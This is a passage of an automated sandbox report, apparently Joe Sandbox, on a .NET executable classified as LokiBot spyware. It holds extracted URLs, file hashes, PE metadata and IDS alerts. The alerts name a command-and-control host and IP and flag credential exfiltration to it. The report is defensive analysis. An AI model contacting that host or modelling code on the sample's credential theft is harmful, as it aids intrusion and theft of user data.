00000000.00000003.251587341.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254920230.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251361011.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251927308.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.252012786.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.250643837.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.fontbureau.com/designers/?hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://www.founder.com.cn/cn/bThehfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.fontbureau.com/designers?hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.ibsensoftware.com/hfyhigXccT.exe, 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000002.281705492.0000000004395000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, hfyhigXccT.exe, 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.tiro.comhfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.fontbureau.com/designershfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.goodfont.co.krhfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.sajatypeworks.comhfyhigXccT.exe, 00000000.00000003.251224303.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251819251.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.253424374.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251109332.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254256494.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251803357.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254662852.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.252067592.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254588808.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.250764720.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251698910.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254981466.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251899560.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.252697276.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.250696385.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251587341.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254920230.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251361011.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251927308.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.252012786.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.250643837.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.typography.netDhfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.founder.com.cn/cn/cThehfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.galapagosdesign.com/staff/dennis.htmhfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.jiyu-kobo.co.jp/7hfyhigXccT.exe, 00000000.00000003.255439447.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://fontfabrik.comhfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.fontbureau.comtto9hfyhigXccT.exe, 00000000.00000003.259973400.0000000005F88000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.259728044.0000000005F87000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.galapagosdesign.com/9qhfyhigXccT.exe, 00000000.00000003.261478813.0000000005FB0000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.261600713.0000000005FB0000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.261371262.0000000005FB0000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.261532870.0000000005FB0000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.galapagosdesign.com/DPleasehfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.jiyu-kobo.co.jp/Y0hfyhigXccT.exe, 00000000.00000003.255439447.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.fonts.comhfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.jiyu-kobo.co.jp/%hfyhigXccT.exe, 00000000.00000003.255439447.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.sandoll.co.krhfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.urwpp.deDPleasehfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.zhongyicts.com.cnhfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.sajatypeworks.comehfyhigXccT.exe, 00000000.00000003.251224303.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251819251.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.253424374.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251109332.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254256494.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251803357.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254662852.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.252067592.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254588808.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.250764720.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251698910.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254981466.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251899560.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.252697276.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.250696385.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251587341.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254920230.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251361011.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251927308.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.252012786.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.250643837.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.sakkal.comhfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.apache.org/licenses/LICENSE-2.0hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.fontbureau.comhfyhigXccT.exe, 00000000.00000003.259973400.0000000005F88000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.259728044.0000000005F87000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.galapagosdesign.com/hfyhigXccT.exe, 00000000.00000003.261371262.0000000005FB0000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.comFhfyhigXccT.exe, 00000000.00000003.259973400.0000000005F88000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.259728044.0000000005F87000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.founder.com.cn/cnscrhfyhigXccT.exe, 00000000.00000003.253038446.0000000005F88000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.jiyu-kobo.co.jp/MhfyhigXccT.exe, 00000000.00000003.255439447.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.comMhfyhigXccT.exe, 00000000.00000003.264877441.0000000005F8A000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.jiyu-kobo.co.jp/jp/hfyhigXccT.exe, 00000000.00000003.255439447.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.carterandcone.comlhfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers/cabarga.htmlNhfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.founder.com.cn/cnhfyhigXccT.exe, 00000000.00000003.252891597.0000000005F87000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.253123438.0000000005F87000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.253038446.0000000005F88000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designers/frere-jones.htmlhfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.commhfyhigXccT.exe, 00000000.00000003.264877441.0000000005F8A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  http://www.jiyu-kobo.co.jp/hfyhigXccT.exe, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.comrsivbhfyhigXccT.exe, 00000000.00000003.259973400.0000000005F88000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.259728044.0000000005F87000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.jiyu-kobo.co.jp/ihfyhigXccT.exe, 00000000.00000003.255439447.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers8hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.fontbureau.comituo_hfyhigXccT.exe, 00000000.00000003.259973400.0000000005F88000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.259728044.0000000005F87000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    low
                                    http://www.jiyu-kobo.co.jp/_hfyhigXccT.exe, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://en.w=hfyhigXccT.exe, 00000000.00000003.250750964.0000000005F86000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    low
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    104.155.55.2
                                    sempersim.suUnited States
                                    15169GOOGLEUSfalse
                                    IP
                                    192.168.2.1
                                    Joe Sandbox Version:35.0.0 Citrine
                                    Analysis ID:651263
                                    Start date and time: 23/06/202218:07:072022-06-23 18:07:07 +02:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 8m 3s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:hfyhigXccT.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:25
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@5/3@34/2
                                    EGA Information:
                                    • Successful, ratio: 50%
                                    HDC Information:
                                    • Successful, ratio: 5.1% (good quality ratio 1.4%)
                                    • Quality average: 13.1%
                                    • Quality standard deviation: 26.8%
                                    HCA Information:
                                    • Successful, ratio: 99%
                                    • Number of executed functions: 21
                                    • Number of non-executed functions: 14
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.223.24.244
                                    • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, ocsp.digicert.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                    • Execution Graph export aborted for target hfyhigXccT.exe, PID 6752 because there are no executed function
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    TimeTypeDescription
                                    18:08:18API Interceptor32x Sleep call for process: hfyhigXccT.exe modified
                                    No context
                                    No context
                                    No context
                                    No context
                                    No context
                                    Process:C:\Users\user\Desktop\hfyhigXccT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1216
                                    Entropy (8bit):5.355304211458859
                                    Encrypted:false
                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                    MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                    SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                    SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                    SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                    Malicious:true
                                    Reputation:high, very likely benign file
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                    Process:C:\Users\user\Desktop\hfyhigXccT.exe
                                    File Type:very short file (no magic)
                                    Category:dropped
                                    Size (bytes):1
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3:U:U
                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:1
                                    Process:C:\Users\user\Desktop\hfyhigXccT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):46
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:D898504A722BFF1524134C6AB6A5EAA5
                                    SHA1:E0FDC90C2CA2A0219C99D2758E68C18875A3E11E
                                    SHA-256:878F32F76B159494F5A39F9321616C6068CDB82E88DF89BCC739BBC1EA78E1F9
                                    SHA-512:26A4398BFFB0C0AEF9A6EC53CD3367A2D0ABF2F70097F711BBBF1E9E32FD9F1A72121691BB6A39EEB55D596EDD527934E541B4DEFB3B1426B1D1A6429804DC61
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:..............................................
                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):7.592985488755628
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    File name:hfyhigXccT.exe
                                    File size:486912
                                    MD5:f0ddd6f32e65868acc9d38b35af0e2c5
                                    SHA1:c0b1cb63866b3b2351a8f68d38e61284c0ed2874
                                    SHA256:748eaf926943f0130b633506282d02f29da4d42d2172b3afce65246633994326
                                    SHA512:d54fc92a0cdebfdcf3ef5fd2df7f885f853224341c053b939a4cc145688a3aad40bc3e2d73dd46f8a9d06c8a055a155478b2eef98e818ee0e534ff598ca71fb3
                                    SSDEEP:12288:NpkPRxliW1CCQo40YdLSs3fJD26kgBS/LsZEgp:fkPRrhLsdLRJD2D+SQZEg
                                    TLSH:11A4E1D4E3984AABD883C3FC587C85002667F74AC5ACC606BCBA3597D5B23DA9193D07
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...]..b..............0..d............... ........@.. ....................................@................................
                                    Icon Hash:00828e8e8686b000
                                    Entrypoint:0x478386
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x62B48A5D [Thu Jun 23 15:44:29 2022 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x783340x4f.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x7a0000x42c.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x7c0000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000x7638c0x76400False0.804710210755814data7.609356662747534IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rsrc0x7a0000x42c0x600False0.2799479166666667data2.4137483306892307IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x7c0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountry
                                    RT_VERSION0x7a0580x3d0data
                                    DLLImport
                                    mscoree.dll_CorExeMain
                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    104.155.55.2192.168.2.380497452025483 06/23/22-18:08:31.463728TCP2025483ET TROJAN LokiBot Fake 404 Response8049745104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249896802825766 06/23/22-18:10:16.412962TCP2825766ETPRO TROJAN LokiBot Checkin M24989680192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249744802024312 06/23/22-18:08:28.518392TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974480192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249842802024313 06/23/22-18:09:36.768062TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984280192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249773802025381 06/23/22-18:08:56.128163TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.3104.155.55.2
